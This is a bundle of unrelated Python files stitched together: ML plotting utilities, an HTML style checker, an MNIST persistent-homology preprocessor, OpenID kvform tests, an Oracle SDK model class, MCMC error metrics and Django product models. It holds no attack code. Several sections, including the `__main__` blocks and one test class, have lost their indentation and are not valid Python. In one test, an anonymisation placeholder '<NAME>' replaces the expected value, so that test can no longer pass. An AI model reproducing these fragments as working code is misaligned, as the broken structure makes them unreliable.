        run (int): optional. If not None, encode run number in the filename.
    """
    predictions = val_table.copy()
    # Build one image per catalog row, stacked along the batch dimension.
    batch = np.stack(
        [input_utils.construct_image(row, instruct)
         for _, row in predictions.iterrows()]
    )
    predictions['prediction'] = model.predict(batch)
    if run is None:
        out_name = 'validation_predictions.csv'
    else:
        out_name = 'validation_predictions_run_{}.csv'.format(run)
    predictions.to_csv(os.path.join(instruct['model_dir'], out_name))
def plot_metrics(acc, loss, val_acc, val_loss, instruct, plt):
    """Plot per-run accuracy and loss curves (validation left, training right)
    and save them as '<name>_<run>_acc.png' and '<name>_<run>_loss.png'.

    Deprecated: prefer plot_aggregate_metrics.

    Args:
        acc, loss, val_acc, val_loss: per-run metric arrays (epochs on axis 1).
        instruct (dict): configuration; 'name' and 'run_n' build the filenames.
        plt: matplotlib.pyplot module (passed in by the caller).
    """
    # Typo fixed in the warning text ("aggregatre" -> "aggregate_metrics").
    warnings.warn('plot_metrics will be deprecated in favour of plot_aggregate_metrics or similar!')
    name = instruct['name'] + '_' + str(instruct['run_n'])
    # Accuracy figure.
    plt.clf()
    sns.set_style("whitegrid")
    sns.set(font_scale=1.5)
    plt.figure(1)
    plt.subplot(121)
    # NOTE(review): sns.tsplot was removed in seaborn >= 0.9 — switch to
    # lineplot if seaborn is ever upgraded.
    sns.tsplot(val_acc)
    plt.xlabel('Epoch')
    plt.ylabel('Accuracy')
    plt.ylim([0, 1.0])
    plt.title('Validation')
    plt.subplot(122)
    sns.tsplot(acc)
    plt.xlabel('Epoch')
    plt.ylabel('Accuracy')
    plt.ylim([0, 1.0])
    plt.title('Training')
    plt.figure(1).subplots_adjust(left=0.1, right=0.9, wspace=0.25)
    plt.savefig(name + '_acc.png')
    # Loss figure.
    plt.clf()
    sns.set_style("whitegrid")
    sns.set(font_scale=1.5)
    plt.figure(2)
    plt.subplot(121)
    sns.tsplot(val_loss)
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    plt.ylim([0, 1.0])
    plt.title('Validation')
    plt.subplot(122)
    sns.tsplot(loss)
    plt.xlabel('Epoch')
    plt.ylabel('Loss')
    plt.ylim([0, 1.0])
    plt.title('Training')
    # BUG FIX: this previously adjusted figure(1), leaving the loss figure
    # (figure 2) un-adjusted before saving.
    plt.figure(2).subplots_adjust(left=0.1, right=0.9, wspace=0.25)
    plt.savefig(name + '_loss.png')
|
# coding=utf-8
from bs4 import BeautifulSoup
import re
def unstandard_count(soup, tag_name, tag, standard_format):
    """Count `tag` elements under each `tag_name` section whose style attribute
    does not match the regex `standard_format`, printing the running totals."""
    sections = soup.select(tag_name)
    print("length subs info: ", len(sections))
    mismatched = 0
    for section in sections:
        all_tags = section.find_all(tag)
        matching = section.find_all(tag, {"style": re.compile(standard_format)})
        print("subs length:{} and length style_tag:{}".format(len(all_tags), len(matching)))
        mismatched += len(all_tags) - len(matching)
    print("在查找到的标签范围内不匹配的值为:", mismatched)
#unstandard_count(html,"table","col",col_style)
#check levels title
def unstandard_title(soup, tag_name, child_tag, levels, standard_format_num, standard_format_char, standard_format_num2=None):
    """Check heading items of a given level against the numeric and character
    style formats and print how many do not match.

    Bug fix: `child_tag_nums2` was only assigned inside `if levels > 1`, so any
    call with `levels <= 1` raised NameError at the second loop. It now falls
    back to `standard_format_num2` when provided, or an empty result.

    Args:
        soup: BeautifulSoup document.
        tag_name / child_tag: container selector and child tag to inspect.
        levels (int): heading level; selects class "<levels> a DocDefaults ".
        standard_format_num / standard_format_char: style regex / exact style
            for numeric and character heading parts.
        standard_format_num2: optional secondary numeric style regex
            (overridden by the module-level highLevel_num_format when levels > 1,
            preserving the original behavior).
    """
    subjects = soup.select('%s[class="%d a DocDefaults "]' % (tag_name, levels))
    print("{} level title select nums: {}".format(levels, len(subjects)))
    total_items = 0
    cur_level_num = 0
    cur_level_char = 0
    for sub in subjects:
        sub_tags = sub.select(child_tag)
        total_items += len(sub_tags)
        child_tag_nums = sub.find_all(child_tag, {"style": re.compile(standard_format_num)})
        if levels > 1:
            # Preserves existing behavior: levels above 1 always use the
            # module-level highLevel_num_format, ignoring the argument.
            standard_format_num2 = highLevel_num_format
        if standard_format_num2 is not None:
            child_tag_nums2 = sub.find_all(child_tag, {"style": re.compile(standard_format_num2)})
        else:
            child_tag_nums2 = []  # fix: previously undefined when levels <= 1
        for child_tag_num in child_tag_nums:
            if len(re.sub(r'\w', '', child_tag_num.text)) <= 1:
                cur_level_num += 1
        for child_tag_num in child_tag_nums2:
            if len(re.sub(r'\w', '', child_tag_num.text)) < len(child_tag_num.text):
                cur_level_num += 1
        child_tag_chars = sub.find_all(child_tag, {"style": standard_format_char})
        cur_level_char += len(child_tag_chars)
    non_match_items = total_items - cur_level_char - cur_level_num
    print("当前标题级别{}--总的查找条目:{},在查找到的标签范围内不匹配的值为:{}".format(levels, total_items, non_match_items))
"""
#check table font
span_info=[];ss_info=[]
style_info = re.compile('color: #000000;font-size: 11.0pt;;font-family: "SimSun";')
pattern = re.compile(".*color.")
style_info = 'color'
count = 0;count_style=0
td_style = "background-color: #FFC000;border-bottom-style: \
solid;border-bottom-width: 1px;border-bottom-color: \
#000000;border-left-style: solid;border-left-width: \
1px;border-left-color: #000000;border-right-style: \
solid;border-right-width: 1px;border-right-color: \
#000000;border-top-style: solid;border-top-width: \
1px;border-top-color: #000000;vertical-align: bottom;"
col_style = "width: 13.85%;"
tr_style = "height: 0.19in;"
sum_all = 0
#check col style:width,#check tr standard
tables = html.select('table[id^="docx4j"]')
print("length table",len(tables))
for table in tables:
childs = table.colgroup.children
style_col = table.find_all("col",{"style":re.compile("width: 13.85%;")})
print("length style_col:",len(style_col))
col_standards = len(style_col)
#print("childs",childs)
col_nums = 0
for child in childs:
col_nums += 1
print("col_standard={} and col_nums={}".format(col_standard,col_nums))
sum_all += col_nums-col_standards
print("all tables non-standard col numbers: ",sum_all)
#check td font-size
for table in table_info:
table_style = table.select('[id^="docx4j"]')
table_style = table.find({"id":re.compile('^docx4j')})
if table_style:
count += 1
td_style = table_style.find({"style":td_style})
print("td_style",td_style)
col_style = table_style.find(style=col_style)
print("col_style",col_style)
tr_style = table_style.find(attrs={"style":tr_style})
print("tr_style",tr_style)
if td_style and col_style and tr_style:
count_style += 1
spans = table.find_all('span')
spans_standards = table.find_all('span',attrs={"style":re.compile('font-size: 11.0pt;;font-family: ')})
#print(spans[0])
for span in spans:
span_info.append(span.text)
for ss in spans_standards:
ss_info.append(ss.text)
print("count={},count_style={} and span_info length={},span_style length={}".format(count,count_style,len(span_info),len(ss_info)))
non_standards = count-count_style + len(span_info) - len(ss_info)
print("表格式不符合规范的记录数:",non_standards)
"""
if __name__ == "__main__":
#check title
loc_format = "text-align: center;margin-top: 5mm;margin-bottom: 0.43in;"
title_font = "font-weight: bold;font-size: 16.0pt;"
html = BeautifulSoup(open('data/doc2html.html','r',encoding='utf-8'),'lxml')
title_tag = html.find("p")
standard_title_loc = html.find(attrs={"style":loc_format})
count_title = False
if standard_title_loc:
standard_title = standard_title_loc.find("span",{"style":title_font})
if standard_title:
count_title = True
print("the title match the standard")
#levels title check
title_char_format = "font-size: 12.0pt;"
title_num_format = "font-size: 12.0pt;;font-family: 'Calibri';"
highLevel_num_format = "font-size: 12.0pt;;font-family: 'Cambria';white-space:pre-wrap;"
unstandard_title(html,"p","span",2,title_num_format,title_char_format)
|
import _pickle as cPickle
import gzip
import random
import numpy as np
import os,time,subprocess,glob
from stackPH import lifeVect,histVect
from scipy.ndimage.morphology import distance_transform_edt
from skimage.filters import threshold_otsu
from skimage.transform import resize
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import ImageGrid
import argparse
import h5py
# you need cubical ripser
import cripser
def make_rmnist(n=10, size=None, dim=3, save_test=False):
    """Build a reduced MNIST (2D) or 3D-MNIST dataset with n samples per class.

    Args:
        n (int): training samples kept per digit class.
        size (int): target edge length for resizing; None keeps the native size
            (fix: size=None previously crashed inside resize()).
        dim (int): 2 for classic MNIST, 3 for the Kaggle 3D MNIST volumes.
        save_test (bool): also resize the test split when resizing.

    Returns:
        tuple: (train_x, train_y, test_x, test_y) numpy arrays.
    """
    if dim == 2:
        with gzip.open("mnist.pkl.gz", 'rb') as f:  # the original MNIST
            td, vd, ts = cPickle.load(f, encoding='latin1')
        train_x = np.array(td[0]).reshape((-1, 28, 28))
        train_y = np.array(td[1], dtype=np.uint8)
        test_x = np.array(ts[0]).reshape((-1, 28, 28))
        test_y = np.array(ts[1], dtype=np.uint8)
    elif dim == 3:  # 3D MNIST in Kaggle
        with h5py.File("full_dataset_vectors.h5", "r") as hf:
            train_x = np.array(hf["X_train"][:]).reshape(-1, 16, 16, 16)
            train_y = np.array(hf["y_train"][:])
            test_x = np.array(hf["X_test"][:]).reshape(-1, 16, 16, 16)
            test_y = np.array(hf["y_test"][:])
    else:
        # Fix: previously fell through to a NameError on train_x.
        raise ValueError("dim must be 2 or 3, got {}".format(dim))
    if n < len(train_x):
        # NOTE(review): unused, but consumes RNG state — kept so the shuffle
        # below reproduces historical subsets under a fixed seed.
        indices = np.random.permutation(len(train_y))
        # Keep the first n occurrences of each digit, then shuffle the subset.
        sub_indices = np.concatenate([np.where(train_y == j)[0][:n] for j in range(10)])
        np.random.shuffle(sub_indices)
        train_x = train_x[sub_indices]
        train_y = train_y[sub_indices]
        print("Used indices:", sub_indices)
    if size is not None and size != train_x[0].shape[0]:
        out_shape = (size,) * dim
        train_x = np.stack([resize(x, out_shape) for x in train_x], axis=0)
        if save_test:
            test_x = np.stack([resize(x, out_shape) for x in test_x], axis=0)
    print("input shape:", train_x.shape, test_x.shape)
    return (train_x, train_y, test_x, test_y)
def plot_mnist(dat):
    """Render a row of images after replacing channel 0 with a signed distance
    transform and collapsing the remaining channels into channels 1 and 2.

    NOTE: mutates *dat* in place.

    Args:
        dat: array of shape (n_images, n_channels, H, W) — presumably float
            images with PH channels after channel 0; TODO confirm with caller.
    """
    fig = plt.figure(figsize=(10, 2))
    grid = ImageGrid(fig, 111,nrows_ncols=(1, len(dat)),axes_pad=0.1)
    for i, img in enumerate(dat[:,0]):
        # Binarise with Otsu, then signed distance (positive inside the digit,
        # negative outside), rescaled to roughly [0, 1] for display.
        bw_img = (img >= threshold_otsu(img))
        dat[i,0] = (distance_transform_edt(bw_img)-distance_transform_edt(~bw_img))/5+0.5
    if dat.shape[1]>3:
        # Fold the first/second halves of the extra channels into channels 1 and 2.
        dat[:,1] = np.sum(dat[:,1:((dat.shape[1]+1)//2)],axis=1)/2
        dat[:,2] = np.sum(dat[:,((dat.shape[1]+1)//2):],axis=1)/2
    for ax, im in zip(grid, dat[:,:3]):
        # (C, H, W) -> (H, W, C): first three channels shown as RGB.
        ax.imshow(im.transpose(1,2,0))
    print(np.max(dat[:,1],axis=(1,2)),"\n",np.max(dat,axis=(2,3)))
    plt.show()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='chainer implementation of pix2pix')
parser.add_argument('--train_sample', '-n', default=1, type=int, help='number of train samples in each class')
parser.add_argument('--size', '-s', default=0, type=int, help='size of image')
parser.add_argument('--dim', '-d', default=2, type=int, choices=[2,3], help='dimension of image')
parser.add_argument('--max_life', '-Ml', default=5, type=int, help='max life')
parser.add_argument('--min_life','-ml', type=float, default=0, help="minimum lifetime to be counted")
parser.add_argument('--ph', default="life", choices=["life","hist"], help="persistence encoding scheme")
parser.add_argument('--plot', '-p', action='store_true',help="just plot")
parser.add_argument('--save_test', '-t', action='store_true',help="create test dataset in addition to training dataset")
parser.add_argument('--verbose', '-v', action='store_true')
args = parser.parse_args()
np.random.seed(0)
n = args.train_sample
if args.dim == 2:
dim_str = ""
if args.size == 0:
args.size = 28
else:
dim_str = "3d"
if args.size == 0:
args.size = 16
x_filename = ["rmnist{}{}_s{}_train_{}.npz".format(dim_str,n,args.size,args.ph),
"mnist{}_s{}_test_{}.npz".format(dim_str,args.size,args.ph)]
if args.plot:
k=4
if args.save_test:
dat = np.load(x_filename[1])
else:
dat = np.load(x_filename[0])
print(dat['y'][:k])
if args.dim==2:
plot_mnist(dat['x'][:k])
else:
plot_mnist(dat['x'][:k,:3,:,:,dat['x'].shape[-1]//2])
exit()
tx,ty,vx,vy = make_rmnist(n,size=args.size,dim=args.dim,save_test=args.save_test)
if args.dim==2:
mx,my = tx[0].shape
mz = 1
bd = [0,args.size-1]
else:
mx,my,mz = tx[0].shape
bd = [0,15]
if args.save_test:
datasets = [tx, vx]
datasets_y = [ty, vy]
else:
datasets = [tx]
datasets_y = [ty]
for k,data in enumerate(datasets):
vec = []
i = 1
# PH image
for img in data:
bw_img = (img >= threshold_otsu(img))
dt_img = distance_transform_edt(bw_img)-distance_transform_edt(~bw_img)
ph = cripser.computePH(dt_img.astype(np.float64))
if args.ph=="life":
v=lifeVect(ph,mx,my,mz,max_life=args.max_life)/args.max_life
else:
v=histVect(ph,mx,my,mz,min_life=args.min_life,max_life=args.max_life,
n_life_bins=3,n_birth_bins=3,dims=[0,1])
if args.dim == 2: ## remove boundary
v[:,bd,:]=0
v[:,:,bd]=0
else:
v[:,bd,:,:]=0
v[:,:,bd,:]=0
v[:,:,:,bd]=0
vec.append(np.concatenate([np.expand_dims(img, 0),v],axis=0))
#print(v[v!=0])
#print(img.shape,v.shape)
if i%200 == 0:
print("{} / {}".format(i,len(data)))
i += 1
vec = np.array(vec, dtype=np.float32)
print("output shape:",vec.shape)
np.savez_compressed(x_filename[k], x=vec, y=datasets_y[k])
|
import unittest
from testfixtures import LogCapture
from openid import kvform
class KVDictTest(unittest.TestCase):
    def runTest(self):
        """Check kvToDict parsing, warning counts, and dict->kv->dict identity."""
        for kv_data, expected_dict, expected_warnings in kvdict_cases:
            # Convert KVForm to dict, capturing any parser warnings.
            with LogCapture() as logbook:
                parsed = kvform.kvToDict(kv_data)
            self.assertEqual(parsed, expected_dict)
            # Exactly the expected number of warnings was logged.
            self.assertEqual(len(logbook.records), expected_warnings)
            # Round trip: dict -> kv -> dict must be the identity.
            self.assertEqual(kvform.kvToDict(kvform.dictToKV(parsed)), parsed)
class KVSeqTest(unittest.TestCase):
def cleanSeq(self, seq):
"""Create a new sequence by stripping whitespace from start
and end of each value of each pair"""
clean = []
for k, v in seq:
if isinstance(k, str):
k = k.decode('utf8')
if isinstance(v, str):
v = v.decode('utf8')
clean.append((k.strip(), v.strip()))
return clean
def runTest(self):
for kv_data, result, expected_warnings in kvseq_cases:
# seq serializes to expected kvform
with LogCapture() as logbook:
actual = kvform.seqToKV(kv_data)
self.assertEqual(actual, result)
self.assertIsInstance(actual, str)
# Parse back to sequence. Expected to be unchanged, except
# stripping whitespace from start and end of values
# (i. e. ordering, case, and internal whitespace is preserved)
seq = kvform.kvToSeq(actual)
clean_seq = self.cleanSeq(seq)
self.assertEqual(seq, clean_seq)
self.assertEqual(len(logbook.records), expected_warnings,
"Invalid warnings for {}: {}".format(kv_data, [r.getMessage() for r in logbook.records]))
kvdict_cases = [
# (kvform, parsed dictionary, expected warnings)
('', {}, 0),
('college:harvey mudd\n', {'college': '<NAME>'}, 0),
('city:claremont\nstate:CA\n', {'city': 'claremont', 'state': 'CA'}, 0),
('is_valid:true\ninvalidate_handle:{HMAC-SHA1:2398410938412093}\n',
{'is_valid': 'true', 'invalidate_handle': '{HMAC-SHA1:2398410938412093}'}, 0),
# Warnings from lines with no colon:
('x\n', {}, 1),
('x\nx\n', {}, 2),
('East is least\n', {}, 1),
# But not from blank lines (because LJ generates them)
('x\n\n', {}, 1),
# Warning from empty key
(':\n', {'': ''}, 1),
(':missing key\n', {'': 'missing key'}, 1),
# Warnings from leading or trailing whitespace in key or value
(' street:foothill blvd\n', {'street': 'foothill blvd'}, 1),
('major: computer science\n', {'major': 'computer science'}, 1),
(' dorm : east \n', {'dorm': 'east'}, 2),
# Warnings from missing trailing newline
('e^(i*pi)+1:0', {'e^(i*pi)+1': '0'}, 1),
('east:west\nnorth:south', {'east': 'west', 'north': 'south'}, 1),
]
# Test cases for KVSeqTest: (input sequence, expected kvform, expected warnings).
# NOTE(review): several cases look like Python 2 leftovers — e.g.
# ('\xce\xbbx', 'x') was a UTF-8 byte string under Python 2 but is the
# two-character text 'Îλx' under Python 3; confirm against kvform's current
# encoding behavior before relying on these expectations.
kvseq_cases = [
    ([], '', 0),
    # Make sure that we handle non-ascii characters (also wider than 8 bits)
    ([(u'\u03bbx', u'x')], '\xce\xbbx:x\n', 0),
    # If it's a UTF-8 str, make sure that it's equivalent to the same
    # string, decoded.
    ([('\xce\xbbx', 'x')], '\xce\xbbx:x\n', 0),
    ([('openid', 'useful'), ('a', 'b')], 'openid:useful\na:b\n', 0),
    # Warnings about leading whitespace
    ([(' openid', 'useful'), ('a', 'b')], ' openid:useful\na:b\n', 1),
    # Warnings about leading and trailing whitespace
    ([(' openid ', ' useful '),
      (' a ', ' b ')], ' openid : useful \n a : b \n', 4),
    # warnings about leading and trailing whitespace, but not about
    # internal whitespace.
    ([(' open id ', ' use ful '),
      (' a ', ' b ')], ' open id : use ful \n a : b \n', 4),
    ([(u'foo', 'bar')], 'foo:bar\n', 0),
]
# Sequences that seqToKV must reject with ValueError: newlines embedded in
# keys or values, and ':' inside a key.
kvexc_cases = [
    [('openid', 'use\nful')],
    [('open\nid', 'useful')],
    [('open\nid', 'use\nful')],
    [('open:id', 'useful')],
    [('foo', 'bar'), ('ba\n d', 'seed')],
    [('foo', 'bar'), ('bad:', 'seed')],
]
class KVExcTest(unittest.TestCase):
    def runTest(self):
        """Every malformed sequence must make seqToKV raise ValueError."""
        for bad_seq in kvexc_cases:
            with self.assertRaises(ValueError):
                kvform.seqToKV(bad_seq)
class GeneralTest(unittest.TestCase):
    # NOTE(review): '<None>' looks like an anonymisation placeholder. This
    # class attribute is unused in practice — the method body resolves
    # `kvform` to the module-level import, not to this attribute.
    kvform = '<None>'

    def test_convert(self):
        """seqToKV coerces non-string pairs and logs two warnings (key + value)."""
        with LogCapture() as logbook:
            result = kvform.seqToKV([(1, 1)])
        self.assertEqual(result, '1:1\n')
        self.assertEqual(len(logbook.records), 2)
|
<gh_stars>0
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class FacetedSearchDateFilterRequest(object):
    """Date-range filter criteria for a faceted search request."""

    def __init__(self, **kwargs):
        """
        Initializes a new FacetedSearchDateFilterRequest object with values
        from keyword arguments. Supported kwargs (matching the properties of
        this class):

        :param field_name: date field name to filter by.
        :type field_name: str
        :param time_after: lower bound of the date range.
        :type time_after: datetime
        :param time_before: upper bound of the date range.
        :type time_before: datetime
        """
        # Maps consumed by the OCI SDK (de)serialisation machinery; keys must
        # match the property names, values the wire ("camelCase") names.
        self.swagger_types = {
            'field_name': 'str',
            'time_after': 'datetime',
            'time_before': 'datetime'
        }
        self.attribute_map = {
            'field_name': 'fieldName',
            'time_after': 'timeAfter',
            'time_before': 'timeBefore'
        }
        self._field_name = None
        self._time_after = None
        self._time_before = None

    @property
    def field_name(self):
        """
        Gets the field_name of this FacetedSearchDateFilterRequest.
        Date field name that needs to be filtered by.

        :rtype: str
        """
        return self._field_name

    @field_name.setter
    def field_name(self, field_name):
        """
        Sets the field_name of this FacetedSearchDateFilterRequest.

        :type: str
        """
        self._field_name = field_name

    @property
    def time_after(self):
        """
        Gets the time_after of this FacetedSearchDateFilterRequest.
        The date and time the request was created, as described in
        `RFC 3339`__, section 14.29.

        __ https://tools.ietf.org/rfc/rfc3339

        :rtype: datetime
        """
        return self._time_after

    @time_after.setter
    def time_after(self, time_after):
        """
        Sets the time_after of this FacetedSearchDateFilterRequest.

        :type: datetime
        """
        self._time_after = time_after

    @property
    def time_before(self):
        """
        Gets the time_before of this FacetedSearchDateFilterRequest.
        The date and time the request was created, as described in
        `RFC 3339`__, section 14.29.

        __ https://tools.ietf.org/rfc/rfc3339

        :rtype: datetime
        """
        return self._time_before

    @time_before.setter
    def time_before(self, time_before):
        """
        Sets the time_before of this FacetedSearchDateFilterRequest.

        :type: datetime
        """
        self._time_before = time_before

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        # None compares unequal; otherwise compare full attribute state.
        return other is not None and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other
|
<filename>phase4_analysis/metrics.py
# <NAME> (<EMAIL>)
import numpy as np
import scipy.stats as ss
#from diagnostics import MIN_ESS
MIN_ESS_PER_CHAIN = 1.0 # TODO limit dupes
def stack_first(X):
    """Collapse the first two axes of a (chains, samples, dim) array into one,
    with the chain blocks stacked one after another."""
    assert X.ndim == 3
    n_first, n_second, dim = X.shape
    return X.reshape((n_first * n_second, dim))
def interleave(X):
    """Collapse a (chains, samples, dim) array into (chains*samples, dim),
    interleaving: sample 0 of every chain first, then sample 1, and so on."""
    assert X.ndim == 3
    swapped = X.transpose((1, 0, 2))
    return stack_first(swapped)
def mean(chain):
    """Per-dimension sample mean of a (samples, dim) chain."""
    assert np.ndim(chain) == 2
    return np.mean(chain, axis=0)
def var(chain):
    """Per-dimension unbiased (ddof=1) sample variance of a (samples, dim) chain."""
    assert np.ndim(chain) == 2
    return np.var(chain, axis=0, ddof=1)
def ks(exact, chain):
    """Two-sample Kolmogorov-Smirnov statistic, computed per dimension.

    Args:
        exact: (n, D) reference samples.
        chain: (m, D) samples to compare against the reference.

    Returns:
        np.ndarray of shape (D,): KS statistic for each dimension.
    """
    assert np.ndim(exact) == 2
    D = exact.shape[1]
    assert np.ndim(chain) == 2 and chain.shape[1] == D
    # Fix: `xrange` is Python 2 only (NameError under Python 3); `range`
    # behaves identically here on both.
    ks_stat = np.array([ss.ks_2samp(exact[:, ii], chain[:, ii])[0]
                        for ii in range(D)])
    return ks_stat
# Metrics estimated from a single chain (compared against the exact estimate)
# vs. metrics that take the exact reference samples directly.
MOMENT_METRICS = {'mean': mean, 'var': var}
OTHER_METRICS = {'ks': ks}
# Defined as expected loss for N(0,1) * n_samples
METRICS_REF = {'mean': 1.0, 'var': 2.0, 'ks': 0.822}
def rectified_sq_error(exact, approx, clip):
    """Elementwise squared error between exact and approx, capped at clip."""
    squared = (exact - approx) ** 2
    return np.minimum(clip, squared)
def eval_inc(exact_chain, all_chains, metric, all_idx):
    """Incremental error curve: for each prefix length in `all_idx`, the
    clipped squared error of each chain's estimate vs. the exact reference,
    averaged over chains and dimensions.

    Args:
        exact_chain: (n_exact, D) reference samples.
        all_chains: list of n_chains arrays, each of shape (n_samples, D).
        metric: key into MOMENT_METRICS or OTHER_METRICS.
        all_idx: (n_grid, n_chains) prefix lengths at which to evaluate.

    Returns:
        np.ndarray of shape (n_grid,).
    """
    n_grid, n_chains = all_idx.shape
    assert(n_chains >= 1)
    assert(len(all_chains) == n_chains)
    D = all_chains[0].shape[1]
    if metric in MOMENT_METRICS:
        # Moment metrics compare the chain's estimate to the exact estimate.
        estimator = MOMENT_METRICS[metric]
        exact = estimator(exact_chain)
        moment_metric = True
    else:
        assert(metric in OTHER_METRICS)
        estimator = OTHER_METRICS[metric]
        moment_metric = False
    # Cap each squared error so a pathological short prefix can't dominate.
    clip = METRICS_REF[metric] / MIN_ESS_PER_CHAIN
    err = np.zeros((n_grid, n_chains))
    for c_num, chain in enumerate(all_chains):
        assert(chain.ndim == 2 and chain.shape[1] == D)
        # Just do it naively right now instead of online & incremental
        for ii, n_samples in enumerate(all_idx[:, c_num]):
            if moment_metric:
                approx = estimator(chain[:n_samples, :])
                err[ii, c_num] = np.mean(rectified_sq_error(exact, approx, clip))
            else:
                # Distribution metrics (e.g. KS) already measure a distance,
                # so the "error" is the metric value itself squared vs. 0.
                approx = estimator(exact_chain, chain[:n_samples, :])
                err[ii, c_num] = np.mean(rectified_sq_error(0.0, approx, clip))
    err = np.mean(err, axis=1)  # ave over chains
    assert(err.shape == (n_grid,))
    return err
def eval_total(exact_chain, all_chains, metric):
    """Full-length error of each chain against the exact reference, averaged
    over chains; one value per dimension.

    Args:
        exact_chain: (n_exact, D) reference samples.
        all_chains: list of (n_samples, D) arrays.
        metric: key into MOMENT_METRICS or OTHER_METRICS.

    Returns:
        np.ndarray of shape (D,).
    """
    n_chains = len(all_chains)
    assert n_chains >= 1
    assert exact_chain.ndim == 2
    D = exact_chain.shape[1]
    moment_metric = metric in MOMENT_METRICS
    if moment_metric:
        estimator = MOMENT_METRICS[metric]
        exact = estimator(exact_chain)
    else:
        assert metric in OTHER_METRICS
        estimator = OTHER_METRICS[metric]
    # Cap per-dimension error so one pathological chain can't dominate.
    clip = METRICS_REF[metric] / MIN_ESS_PER_CHAIN
    err = np.zeros((D, n_chains))
    for c_num, chain in enumerate(all_chains):
        assert chain.ndim == 2 and chain.shape[1] == D
        if moment_metric:
            err[:, c_num] = rectified_sq_error(exact, estimator(chain), clip)
        else:
            err[:, c_num] = rectified_sq_error(0.0, estimator(exact_chain, chain), clip)
    err = np.mean(err, axis=1)  # ave over chains
    assert err.shape == (D,)
    return err
def eval_pooled(exact_chain, all_chains, metric):
    """Error of all chains pooled into one long chain vs. the exact reference.

    Returns:
        np.ndarray of shape (D,).
    """
    n_chains = len(all_chains)
    assert n_chains >= 1
    assert exact_chain.ndim == 2
    D = exact_chain.shape[1]
    moment_metric = metric in MOMENT_METRICS
    if moment_metric:
        estimator = MOMENT_METRICS[metric]
        exact = estimator(exact_chain)
    else:
        assert metric in OTHER_METRICS
        estimator = OTHER_METRICS[metric]
    # Pooling multiplies the effective sample count, so tighten the clip.
    clip = METRICS_REF[metric] / (MIN_ESS_PER_CHAIN * n_chains)
    pooled = stack_first(np.asarray(all_chains))
    if moment_metric:
        err = rectified_sq_error(exact, estimator(pooled), clip)
    else:
        err = rectified_sq_error(0.0, estimator(exact_chain, pooled), clip)
    assert err.shape == (D,)
    return err
|
from django.conf import settings
from django.contrib.auth import get_user_model
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from PIL import Image
import io
User = get_user_model()
"""Images of products to use online"""
class ProductFigure(models.Model):
    """An image of a product, optionally visible to all users."""
    image = models.ImageField(_('Product Figure'), upload_to='figures/%Y/%m/%d/')
    public = models.BooleanField(_('Avaliable to All'), default=False)
    owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
                              on_delete=models.SET_NULL)

    def resize_figure(self, size=(256, 256)):
        """Shrink the stored image file in place so it fits within *size*."""
        try:
            image = Image.open(self.image.path)
            # Fix: Image.ANTIALIAS was deprecated and removed in Pillow 10;
            # Image.LANCZOS is the same resampling filter under its current name.
            image.thumbnail(size, Image.LANCZOS)
            image.save(self.image.path)
        except IOError:
            # Best effort: keep the original file if it cannot be processed.
            print("Cannot resize", self.image.name)

    # AFTER saving, resize the image and overwrite the stored file.
    def save(self, *args, **kwargs):
        super().save(*args, **kwargs)
        self.resize_figure()

    def __str__(self):
        return self.image.name

    def get_absolute_url(self):
        return reverse('edit_figure', args=[self.pk])

    def is_owner(self, user):
        # NOTE: owner may be None (SET_NULL on user deletion).
        return self.owner == user
"""Categories for products"""
class ProductCategory(models.Model):
    """A user-owned grouping of products, optionally public, with an
    optional representative figure."""
    title = models.CharField(_('Title'), max_length=64)
    description = models.TextField(_('Description'))
    public = models.BooleanField(_('Avaliable to All'), default=False)
    owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
                              on_delete=models.SET_NULL)
    category_figure = models.ForeignKey(ProductFigure, blank=True, null=True,
                                        on_delete=models.SET_NULL)

    class Meta:
        # One user cannot own two categories with the same title.
        unique_together = ("title", "owner")
        verbose_name = "Product Category"
        verbose_name_plural = "Product Categories"

    def __str__(self):
        return self.title

    def get_absolute_url(self):
        return reverse('edit_category', args=[self.pk])

    def is_owner(self, user):
        # NOTE: owner may be None (SET_NULL on user deletion).
        return self.owner == user
"""The actual product"""
class Product(models.Model):
    """The actual product: a titled, categorised, user-owned item."""
    title = models.CharField(_('Title'), max_length=64)
    description = models.TextField(_('Description'))
    product_category = models.ForeignKey(ProductCategory, null=True,
                                         on_delete=models.SET_NULL, related_name='category')
    product_figure = models.ForeignKey(ProductFigure, blank=True, null=True,
                                       on_delete=models.SET_NULL, related_name='figure')
    owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
                              on_delete=models.SET_NULL, related_name='owner')

    class Meta:
        # One user cannot own two products with the same title.
        unique_together = ("title", "owner")
        verbose_name = "Product"
        verbose_name_plural = "Products"

    def __str__(self):
        return self.title

    def save(self,*args,**kwargs):
        # On first save (no pk yet), create the product's default image slot.
        created = not self.pk
        super().save(*args,**kwargs)
        if created:
            ProductImage.objects.create(product=self)

    def get_absolute_url(self):
        return reverse('detailed_product', args=[self.pk])

    def is_owner(self, user):
        # NOTE: owner may be None (SET_NULL on user deletion).
        return self.owner == user
"""Images required for products"""
class ProductImage(models.Model):
    """Requirements for an image a product must (or may) provide: aspect
    ratio, orientation flexibility, and megapixel bounds."""
    product = models.ForeignKey(Product, on_delete=models.CASCADE)
    required = models.BooleanField(_('Required'), default=True)
    rotatable = models.BooleanField(_('Avaliable in Landscape and Portrait Format'), default=True)
    ratio = models.DecimalField(_('Ratio x/y'), max_digits=4, default=1.333,
                                decimal_places=3)
    min_megapixels = models.DecimalField(_('Minimum Mega Pixels'), default=0.5,
                                         max_digits=4, decimal_places=1)
    warn_megapixels = models.DecimalField(_('Warning Mega Pixels'), default=2.1,
                                          max_digits=4, decimal_places=1)

    def get_absolute_url(self):
